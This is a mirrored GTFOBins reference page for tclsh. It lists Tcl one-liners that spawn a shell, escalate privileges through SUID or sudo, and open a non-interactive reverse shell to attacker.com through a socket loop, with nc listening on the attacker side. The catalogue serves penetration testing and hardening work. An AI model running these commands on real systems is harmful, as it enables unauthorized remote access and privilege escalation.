public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-07-03 00:45:35 +02:00
Code Issues Projects Releases Wiki Activity
GTFOBins.github.io/_gtfobins/tclsh.md
Emilio Pinna dd337b5ddf Adopt new function names
2018-10-05 18:55:38 +01:00

682 B
Raw Blame History

functions
shell non-interactive-reverse-shell suid sudo
code
tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
code
./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr
code
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr